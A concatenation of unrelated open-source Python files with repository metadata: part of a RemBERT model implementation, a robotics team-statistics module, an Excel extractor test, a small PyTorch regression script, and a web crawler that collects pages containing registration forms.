(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
instead of all :obj:`decoder_input_ids` of shape :obj:`(batch_size, sequence_length)`.
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the left-to-right language modeling loss (next word prediction). Indices should be in
``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are
ignored (masked), the loss is only computed for the tokens with labels n ``[0, ..., config.vocab_size]``.
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
Returns:
Example::
>>> from transformers import RemBertTokenizer, RemBertForCausalLM, RemBertConfig
>>> import torch
>>> tokenizer = RemBertTokenizer.from_pretrained('rembert')
>>> config = RemBertConfig.from_pretrained("rembert")
>>> config.is_decoder = True
>>> model = RemBertForCausalLM.from_pretrained('rembert', config=config)
>>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
>>> outputs = model(**inputs)
>>> prediction_logits = outputs.logits
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
lm_loss = None
if labels is not None:
# we are doing next-token prediction; shift prediction scores and input ids by one
shifted_prediction_scores = prediction_scores[:, :-1, :].contiguous()
labels = labels[:, 1:].contiguous()
loss_fct = CrossEntropyLoss()
lm_loss = loss_fct(shifted_prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (prediction_scores,) + outputs[2:]
return ((lm_loss,) + output) if lm_loss is not None else output
return CausalLMOutputWithCrossAttentions(
loss=lm_loss,
logits=prediction_scores,
past_key_values=outputs.past_key_values,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
def prepare_inputs_for_generation(self, input_ids, past=None, attention_mask=None, **model_kwargs):
input_shape = input_ids.shape
# if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly
if attention_mask is None:
attention_mask = input_ids.new_ones(input_shape)
# cut decoder_input_ids if past is used
if past is not None:
input_ids = input_ids[:, -1:]
return {"input_ids": input_ids, "attention_mask": attention_mask, "past_key_values": past}
def _reorder_cache(self, past, beam_idx):
reordered_past = ()
for layer_past in past:
reordered_past += (
tuple(past_state.index_select(0, beam_idx) for past_state in layer_past[:2]) + layer_past[2:],
)
return reordered_past
@add_start_docstrings(
"""
RemBERT Model transformer with a sequence classification/regression head on top (a linear layer on top of the
pooled output) e.g. for GLUE tasks.
""",
REMBERT_START_DOCSTRING,
)
class RemBertForSequenceClassification(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.rembert = RemBertModel(config)
self.dropout = nn.Dropout(config.classifier_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=SequenceClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
RemBERT Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
softmax) e.g. for RocStories/SWAG tasks.
""",
REMBERT_START_DOCSTRING,
)
class RemBertForMultipleChoice(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.rembert = RemBertModel(config)
self.dropout = nn.Dropout(config.classifier_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, 1)
self.init_weights()
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=MultipleChoiceModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the multiple choice classification loss. Indices should be in ``[0, ...,
num_choices-1]`` where :obj:`num_choices` is the size of the second dimension of the input tensors. (See
:obj:`input_ids` above)
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1]
input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None
attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None
token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None
position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None
inputs_embeds = (
inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1))
if inputs_embeds is not None
else None
)
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
reshaped_logits = logits.view(-1, num_choices)
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(reshaped_logits, labels)
if not return_dict:
output = (reshaped_logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return MultipleChoiceModelOutput(
loss=loss,
logits=reshaped_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
RemBERT Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
Named-Entity-Recognition (NER) tasks.
""",
REMBERT_START_DOCSTRING,
)
class RemBertForTokenClassification(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.rembert = RemBertModel(config, add_pooling_layer=False)
self.dropout = nn.Dropout(config.classifier_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=TokenClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the token classification loss. Indices should be in ``[0, ..., config.num_labels -
1]``.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.num_labels)
active_labels = torch.where(
active_loss, labels.view(-1), torch.tensor(loss_fct.ignore_index).type_as(labels)
)
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TokenClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
RemBERT Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
REMBERT_START_DOCSTRING,
)
class RemBertForQuestionAnswering(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.rembert = RemBertModel(config, add_pooling_layer=False)
self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=QuestionAnsweringModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
start_positions=None,
end_positions=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the
sequence are not taken into account for computing the loss.
end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the
sequence are not taken into account for computing the loss.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
logits = self.qa_outputs(sequence_output)
start_logits, end_logits = logits.split(1, dim=-1)
start_logits = start_logits.squeeze(-1)
end_logits = end_logits.squeeze(-1)
total_loss = None
if start_positions is not None and end_positions is not None:
# If we are on multi-GPU, split add a dimension
if len(start_positions.size()) > 1:
start_positions = start_positions.squeeze(-1)
if len(end_positions.size()) > 1:
end_positions = end_positions.squeeze(-1)
# sometimes the start/end positions are outside our model inputs, we ignore these terms
ignored_index = start_logits.size(1)
start_positions.clamp_(0, ignored_index)
end_positions.clamp_(0, ignored_index)
loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
start_loss = loss_fct(start_logits, start_positions)
end_loss = loss_fct(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
if not return_dict:
output = (start_logits, end_logits) + outputs[2:]
return ((total_loss,) + output) if total_loss is not None else output
return QuestionAnsweringModelOutput(
loss=total_loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
| 42.220608
| 213
| 0.662104
|
42041a8c8316b637a72c75b8f8f50f9fcd597576
| 5,853
|
py
|
Python
|
src/calculations/obj_team.py
|
frc1678/server-2021-public
|
d61e35f8385bf1debc9daaaed40208f6c783ed77
|
[
"MIT"
] | null | null | null |
src/calculations/obj_team.py
|
frc1678/server-2021-public
|
d61e35f8385bf1debc9daaaed40208f6c783ed77
|
[
"MIT"
] | null | null | null |
src/calculations/obj_team.py
|
frc1678/server-2021-public
|
d61e35f8385bf1debc9daaaed40208f6c783ed77
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""Calculate objective team data from Team in Match (TIM) data."""
import utils
from typing import List, Dict
from calculations import base_calculations
from statistics import pstdev
class OBJTeamCalc(base_calculations.BaseCalculations):
"""Runs OBJ Team calculations"""
# Get the last section of each entry (so foo.bar.baz becomes baz)
SCHEMA = utils.unprefix_schema_dict(utils.read_schema('schema/calc_obj_team_schema.yml'))
def __init__(self, server):
"""Overrides watched collections, passes server object"""
super().__init__(server)
self.watched_collections = ['obj_tim']
def get_action_counts(self, tims: List[Dict]):
"""Gets a list of times each team completed a certain action by tim for averages
and standard deviations.
"""
tim_action_counts = {}
# Gathers all necessary schema fields
tim_fields = set()
for schema in {**self.SCHEMA['averages'], **self.SCHEMA['standard_deviations']}.values():
tim_fields.add(schema['tim_fields'][0])
for tim_field in tim_fields:
# Gets the total number of actions across all tims
tim_action_counts[tim_field] = [tim[tim_field.split('.')[1]] for tim in tims]
return tim_action_counts
def calculate_averages(self, tim_action_counts):
"""Creates a dictionary of calculated averages, called team_info,
where the keys are the names of the calculations, and the values are the results
"""
team_info = {}
for calculation, schema in self.SCHEMA['averages'].items():
# Average the values for the tim_fields
average = 0
for tim_field in schema['tim_fields']:
average += self.avg(tim_action_counts[tim_field])
team_info[calculation] = average
return team_info
def calculate_standard_deviations(self, tim_action_counts):
"""Creates a dictionary of calculated standard deviations, called team_info,
where the keys are the names of the calculation, and the values are the results
"""
team_info = {}
for calculation, schema in self.SCHEMA['standard_deviations'].items():
# Take the standard deviation for the tim_field
tim_field = schema['tim_fields'][0]
standard_deviation = pstdev(tim_action_counts[tim_field])
team_info[calculation] = standard_deviation
return team_info
def filter_tims_for_counts(self, tims: List[Dict], schema):
"""Filters tims based on schema for count calculations"""
tims_that_meet_filter = tims
for key, value in schema['tim_fields'].items():
if key != 'not':
# Checks that the TIMs in their given field meet the filter
tims_that_meet_filter = list(
filter(lambda tim: tim[key] == value, tims_that_meet_filter)
)
else:
# not_field expects the output to be anything but the given filter
# not_value is the filter that not_field shouldn't have
for not_field, not_value in value.items():
# Checks that the TIMs in the 'not' field are anything other than the filter
tims_that_meet_filter = list(
filter(
lambda tim: tim.get(not_field, not_value) != not_value,
tims_that_meet_filter,
)
)
return tims_that_meet_filter
def calculate_counts(self, tims: List[Dict]):
"""Creates a dictionary of calculated counts, called team_info,
where the keys are the names of the calculations, and the values are the results
"""
team_info = {}
for calculation, schema in self.SCHEMA['counts'].items():
tims_that_meet_filter = self.filter_tims_for_counts(tims, schema)
team_info[calculation] = len(tims_that_meet_filter)
return team_info
def calculate_extrema(self, tim_action_counts):
"""Creates a dictionary of extreme values, called team_info,
where the keys are the names of the calculations, and the values are the results
"""
team_info = {}
for calculation, schema in self.SCHEMA['extrema'].items():
tim_field = schema['tim_fields'][0]
if schema['extrema_type'] == 'max':
team_info[calculation] = max(tim_action_counts[tim_field])
if schema['extrema_type'] == 'min':
team_info[calculation] = min(tim_action_counts[tim_field])
return team_info
def update_team_calcs(self, teams: list) -> list:
"""Calculate data for given team using objective calculated TIMs"""
obj_team_updates = {}
for team in teams:
# Load team data from database
obj_tims = self.server.db.find('obj_tim', team_number=team)
tim_action_counts = self.get_action_counts(obj_tims)
team_data = self.calculate_averages(tim_action_counts)
team_data['team_number'] = team
team_data.update(self.calculate_counts(obj_tims))
team_data.update(self.calculate_standard_deviations(tim_action_counts))
team_data.update(self.calculate_extrema(tim_action_counts))
obj_team_updates[team] = team_data
return list(obj_team_updates.values())
def run(self):
"""Executes the OBJ Team calculations"""
# Get oplog entries
entries = self.entries_since_last()
for update in self.update_team_calcs(self.find_team_list()):
self.server.db.update_document(
'obj_team', update, {'team_number': update['team_number']}
)
| 45.726563
| 97
| 0.633863
|
1224357c6a2e281e33f45688bd5d22a01ed2b245
| 1,305
|
py
|
Python
|
piperoni/operators/extract/extract_file/tests/test_excel.py
|
CitrineInformatics/piperoni
|
a5764e9da3a51da0a8962a00fd574a97b173d9a4
|
[
"Apache-2.0"
] | 2
|
2021-04-21T19:51:06.000Z
|
2021-04-23T17:57:09.000Z
|
piperoni/operators/extract/extract_file/tests/test_excel.py
|
CitrineInformatics/piperoni
|
a5764e9da3a51da0a8962a00fd574a97b173d9a4
|
[
"Apache-2.0"
] | null | null | null |
piperoni/operators/extract/extract_file/tests/test_excel.py
|
CitrineInformatics/piperoni
|
a5764e9da3a51da0a8962a00fd574a97b173d9a4
|
[
"Apache-2.0"
] | null | null | null |
import os
import pytest
from pandas import DataFrame
import piperoni as etl
from piperoni.operators.extract.extract_file.excel import ExcelExtractor
"""
This module implements tests for the ExcelExtractor.
"""
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
EXCEL_TEST_FILE = os.path.join(
ROOT_DIR,
"..",
"..",
"..",
"..",
"..",
"test_files",
"Strehlow and Cook.xlsx",
)
class TestExcelExtractor:
"""Tests funtionality of ExcelExtractor"""
@pytest.fixture(scope="class")
def all_sheets(self):
return ExcelExtractor()
@pytest.fixture(scope="class")
def only_one_sheet(self):
return ExcelExtractor(sheet_name="Strehlow and Cook")
def test_transform(self, all_sheets, only_one_sheet):
"""Tests loading data with the different optional arguments."""
# tests gathering all sheets
# one of the sheets does not have an aligned table
with pytest.raises(Exception):
assert all_sheets(EXCEL_TEST_FILE)
# tests gathering only one sheet
data = only_one_sheet(EXCEL_TEST_FILE)
assert isinstance(data, dict)
sheet = data["sheet"]
assert isinstance(sheet, DataFrame)
cell_value = sheet["Band gap"][536]
assert cell_value == 2.26
| 24.622642
| 72
| 0.663602
|
974066aaa4e2e0629b718429eb7fbbff1a51cf15
| 1,914
|
py
|
Python
|
Homework6/3_nn_optim_edited3.py
|
XC-Li/Deep_Learning_GWU
|
2dfe0d39ce8f9d981cee545f489f9dde1ffdfa7c
|
[
"MIT"
] | null | null | null |
Homework6/3_nn_optim_edited3.py
|
XC-Li/Deep_Learning_GWU
|
2dfe0d39ce8f9d981cee545f489f9dde1ffdfa7c
|
[
"MIT"
] | null | null | null |
Homework6/3_nn_optim_edited3.py
|
XC-Li/Deep_Learning_GWU
|
2dfe0d39ce8f9d981cee545f489f9dde1ffdfa7c
|
[
"MIT"
] | null | null | null |
#----------------------------------------------------------------------------
import torch
from torch.autograd import Variable
import numpy as np
from matplotlib import pyplot as plt
#----------------------------------------------------------------------------
Batch_size = 64 # Batch size
R = 1 # Input size
S = 100 # Number of neurons
a_size = 1 # Network output size
#----------------------------------------------------------------------------
size = 100
p = np.linspace(-3, 3, size)
t = np.sin(p)
p = Variable(torch.from_numpy(p)).float().view(size, -1).cuda()
t = Variable(torch.from_numpy(t)).float().view(size, -1).cuda()
# p = Variable(torch.randn(Batch_size, R)).cuda()
# t = Variable(torch.randn(Batch_size, a_size), requires_grad=False).cuda()
model = torch.nn.Sequential(
torch.nn.Linear(1, 100),
torch.nn.ReLU(),
torch.nn.Linear(100, 50),
torch.nn.ReLU(),
torch.nn.Linear(50, 25),
torch.nn.ReLU(),
torch.nn.Linear(25, 12),
torch.nn.ReLU(),
torch.nn.Linear(12, 6),
torch.nn.ReLU(),
torch.nn.Linear(6, a_size),
)
model.cuda()
performance_index = torch.nn.MSELoss(reduction='sum')
#----------------------------------------------------------------------------
learning_rate = 1e-4
#----------------------------------------------------------------------------
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
#----------------------------------------------------------------------------
for index in range(10000):
a = model(p)
loss = performance_index(a, t)
print(index, loss.item())
optimizer.zero_grad()
loss.backward()
optimizer.step()
# visualize
prediction = model(p).detach().cpu().numpy()
real = t.cpu().numpy()
x = p.cpu().numpy()
plt.plot(x, real, label="Actual")
plt.scatter(x, prediction, label="NN Prediction")
plt.legend()
plt.title("t=sin(p)")
plt.show()
| 29.446154
| 77
| 0.489551
|
16e52732c497177166005ef0405496254773ee0f
| 28,920
|
py
|
Python
|
chrome/tools/webforms_aggregator.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
chrome/tools/webforms_aggregator.py
|
1065672644894730302/Chromium
|
239dd49e906be4909e293d8991e998c9816eaa35
|
[
"BSD-3-Clause"
] | 395
|
2020-04-18T08:22:18.000Z
|
2021-12-08T13:04:49.000Z
|
chrome/tools/webforms_aggregator.py
|
1065672644894730302/Chromium
|
239dd49e906be4909e293d8991e998c9816eaa35
|
[
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
#!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Downloads web pages with fillable forms after parsing through a set of links.
Used for collecting web pages with forms. Used as a standalone script.
This script assumes that it's run from within the same directory in which it's
checked into. If this script were to be run elsewhere then the path for
REGISTER_PAGE_DIR needs to be changed.
This script assumes that third party modules are installed:
httplib2, lxml, pycurl.
Usage: webforms_aggregator.py [options] [single url or file containing urls]
Options:
-l LOG_LEVEL, --log_level LOG_LEVEL
LOG_LEVEL: debug, info, warning or error [default: error]
-h, --help show this help message and exit
"""
import datetime
import errno
import logging
import optparse
import os
import re
# Needed in Linux so that PyCurl does not throw a segmentation fault.
import signal
import sys
import tempfile
import threading
import time
import urlparse
import httplib2
from lxml import html, etree
import pycurl
REGISTER_PAGE_DIR = os.path.join(os.pardir, 'test', 'data', 'autofill',
'heuristics', 'input')
NOT_FOUND_REG_PAGE_SITES_FILENAME = 'notFoundRegPageSites.txt'
FORM_LOCATION_COMMENT = 'Form Location: %s'
HTML_FILE_PREFIX = 'grabber-'
MAX_REDIRECTIONS = 10
# Strings in a webpage that are indicative of a registration link.
LINK_CLUES = ['regist', 'user', 'sign', 'login', 'account']
MAX_SAME_DOMAIN_URLS_NO = 30
MAX_TOTAL_URLS_PER_DOMAIN = 300
MAX_OPEN_FILES_NO = 500
# URLs are selected for downloading with the following rules from the link
# lists, giving more weight to the links that contain a link clue.
CLUE_SECURE_LINKS_NO = MAX_SAME_DOMAIN_URLS_NO * 3/10
CLUE_GENERAL_LINKS_NO = MAX_SAME_DOMAIN_URLS_NO * 3/10
SECURE_LINKS_NO = MAX_SAME_DOMAIN_URLS_NO * 2/10
GENERAL_LINKS_NO = MAX_SAME_DOMAIN_URLS_NO * 2/10
MAX_ALLOWED_THREADS = MAX_OPEN_FILES_NO / MAX_SAME_DOMAIN_URLS_NO + 1
class Retriever(object):
"""Download, parse, and check if the web page contains a registration form.
The objects of this class has a one to one relation with the web pages. For
each page that is downloaded and parsed an object of this class is created.
Each Retriever object creates a curl object. This object is added to the curl
multi object of the crawler object so that the corresponding pages gets
downloaded.
"""
logger = logging.getLogger(__name__)
def __init__(self, url, domain, cookie_file):
"""Initializes a Retriever object.
Args:
url: url to download page from.
domain: only links with this domain will be retrieved.
cookie_file: the name of a cookie file, needed for pages that use session
cookies to change their contents.
"""
self._url = url
self._domain = domain
self._html_content = ''
# Http links without clues from LINK_CLUES.
self._general_links = []
# Http links that contain a clue from LINK_CLUES.
self._clues_general_links = []
# Https links that do not contain any clues from LINK_CLUES.
self._secure_links = []
# Https links that contain a clue from LINK_CLUES.
self._clues_secure_links = []
self._cookie_file = cookie_file
self._curl_object = None
def __del__(self):
"""Cleans up before this object is destroyed.
The function closes the corresponding curl object that does the downloading.
"""
if self._curl_object:
self._curl_object.close()
def _AddLink(self, link):
"""Adds url |link|, if not already present, to the appropriate list.
The link only gets added to the single list that is appopriate for it:
_secure_links, _general_links, _clues_secure_links or _clues_general_links.
Args:
link: the url that is inserted to the appropriate links list.
"""
# Handles sites with unicode URLs.
if isinstance(link, unicode):
# Encode in 'utf-8' to avoid the UnicodeEncodeError exception.
link = httplib2.iri2uri(link).encode('utf-8')
link_parsed = urlparse.urlparse(link)
link_lists = [self._clues_secure_links, self._secure_links,
self._clues_general_links, self._general_links]
# Checks that the registration page is within the domain.
if (self._domain in link_parsed[1] and
all(link not in x for x in link_lists)):
for clue in LINK_CLUES:
if clue in link.lower():
if link_parsed[0].startswith('https'):
self._clues_secure_links.append(link)
return
else:
self._clues_general_links.append(link)
return
if link_parsed[0].startswith('https'): # No clues found in the link.
self._secure_links.append(link)
else:
self._general_links.append(link)
def ParseAndGetLinks(self):
"""Parses downloaded page and gets url link for non registration page.
Checks if current page contains a registration page and if not it gets
the url links. If it is a registration page, it saves it in a file as
'grabber-' + domain + '.html' after it has added the FORM_LOCATION_COMMENT
and it returns True. Otherwise it returns False.
Returns:
True if current page contains a registration form, and False otherwise.
Raises:
IOError: When can't write to the file.
"""
if not self._domain:
self.logger.error('Error: self._domain was not set')
sys.exit(1)
match_list = re.findall(r'(?P<quote>[\'\"])(?P<link>(?:https?:)?//.*?)\1',
self._html_content)
for group_list in match_list:
link = group_list[1]
if link.startswith('//'):
link = urlparse.urljoin(self._url, link)
self._AddLink(link)
try:
tree = html.fromstring(self._html_content, parser=html.HTMLParser())
except etree.LxmlError:
self.logger.info('\t\tSkipping: not valid HTML code in this page <<< %s',
self._url)
return False
try:
body = tree.iter('body').next()
except StopIteration:
self.logger.info('\t\tSkipping: no "BODY" tag in this page <<< %s',
self._url)
return False
# Get a list of all input elements with attribute type='password'
password_elements = list(body.iterfind('.//input[@type="password"]'))
# Check for multiple password elements to distinguish between a login form
# and a registration form (Password field and Confirm Password field).
if password_elements and len(password_elements) >= 2:
form_elements = []
for password_elem in password_elements:
form_elem = password_elem.xpath('ancestor::form[1]')
if not form_elem:
continue
if not form_elem[0] in form_elements:
form_elements.append(form_elem[0])
else:
# Confirms that the page contains a registration form if two passwords
# are contained in the same form for form_elem[0].
if not os.path.isdir(REGISTER_PAGE_DIR):
os.makedirs(REGISTER_PAGE_DIR)
# Locate the HTML tag and insert the form location comment after it.
html_tag = tree.iter('html').next()
comment = etree.Comment(FORM_LOCATION_COMMENT % self._url)
html_tag.insert(0, comment)
# Create a new file and save the HTML registration page code.
f = open('%s/%s%s.html' % (REGISTER_PAGE_DIR, HTML_FILE_PREFIX,
self._domain), 'w')
try:
f.write(html.tostring(tree, pretty_print=True))
except IOError as e:
self.logger.error('Error: %s', e)
raise
finally:
f.close()
return True # Registration page found.
# Indicates page is not a registration page and links must be parsed.
link_elements = list(body.iter('a'))
for link_elem in link_elements:
link = link_elem.get('href')
if not link or '#' == link[0]:
continue
link = urlparse.urljoin(self._url, link)
link_parsed = urlparse.urlparse(link)
if not link_parsed[0].startswith('http'):
continue
self._AddLink(link)
return False # Registration page not found.
def InitRequestHead(self):
"""Initializes curl object for a HEAD request.
A HEAD request is initiated so that we can check from the headers if this is
a valid HTML file. If it is not a valid HTML file, then we do not initiate a
GET request, saving any unnecessary downloadings.
"""
self._curl_object = pycurl.Curl()
self._curl_object.setopt(pycurl.URL, self._url)
# The following line fixes the GnuTLS package error that pycurl depends
# on for getting https pages.
self._curl_object.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3)
self._curl_object.setopt(pycurl.FOLLOWLOCATION, True)
self._curl_object.setopt(pycurl.NOBODY, True)
self._curl_object.setopt(pycurl.SSL_VERIFYPEER, False);
self._curl_object.setopt(pycurl.MAXREDIRS, MAX_REDIRECTIONS)
self._curl_object.setopt(pycurl.FAILONERROR, False)
self._curl_object.setopt(pycurl.COOKIEFILE, self._cookie_file)
self._curl_object.setopt(pycurl.COOKIEJAR, self._cookie_file)
self._curl_object.setopt(pycurl.CONNECTTIMEOUT, 30)
self._curl_object.setopt(pycurl.TIMEOUT, 300)
self._curl_object.setopt(pycurl.NOSIGNAL, 1)
def InitRequestGet(self):
"""Initializes curl object for a GET request.
This is called only for valid HTML files. The Pycurl makes a GET request.
The page begins to download, but since not all the data of the pages comes
at once. When some of the data on the page is downloaded Pycurl will put
this data in the buffer. The data is appended to the end of the page until
everything is downloaded.
"""
self._curl_object.setopt(pycurl.NOBODY, False)
self._curl_object.setopt(
pycurl.WRITEFUNCTION, lambda buff: setattr(
self, '_html_content', self._html_content + buff))
def Download(self):
"""Downloads the self._url page.
It first does a HEAD request and then it proceeds to a GET request.
It uses a curl object for a single download. This function is called only
once for the initial url of a site when we still don't have more urls from a
domain.
Returns:
True, if the downloaded page is valid HTML code, or False otherwise.
"""
self.InitRequestHead()
try:
self._curl_object.perform()
except pycurl.error as e:
self.logger.error('Error: %s, url: %s', e, self._url)
return False
self._url = urlparse.urljoin(
self._url, self._curl_object.getinfo(pycurl.EFFECTIVE_URL))
content_type = self._curl_object.getinfo(pycurl.CONTENT_TYPE)
if content_type and ('text/html' in content_type.lower()):
self.InitRequestGet()
try:
self._curl_object.perform()
except pycurl.error as e:
self.logger.error('Error: %s, url: %s', e, self._url)
return False
return True
else:
